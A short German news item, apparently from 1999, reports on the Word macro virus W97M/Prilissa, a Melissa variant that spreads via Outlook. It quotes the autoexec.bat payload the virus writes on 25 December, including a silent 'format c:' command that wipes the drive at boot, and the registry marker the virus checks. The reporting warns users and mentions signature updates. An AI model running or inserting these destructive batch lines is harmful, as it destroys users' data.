Weihnachtsvirus

Eine Variante des Melissa-Virus ist laut Networks Associates bereits in 10 Fortune-500-Firmen aufgetaucht. Er soll am 25. Dezember zuschlagen und die Festplatte formatieren.

Unter der Bezeichnung W97M/Prilissa wird der neue und bösartige Virus geführt. Er infiziert Word-Dokumente und verbreitet sich selbst über MS Outlook an andere Benutzer, wenn der Registry-Eintrag "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" "CyberNET"="(C)1999 - Indonesia by AnomOke!" noch nicht vorhanden ist.

Am 25. Dezember überschreibt er dann die Datei autoexec.bat mit folgendem Code:

@echo off

@echo Vine...Vide...Vice...Moslem Power Never End...

@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus !!!

ctty nul

format c: /autotest /q /u

Dieser wird dann beim nächsten Booten ausgeführt. Unter Windows NT ist die Gefahr nicht so groß, weil die autoexec.bat dort nicht beim Booten verwendet wird.

Networks Associates bietet bereits entsprechende Updates für seine Virensignaturen an. (mha)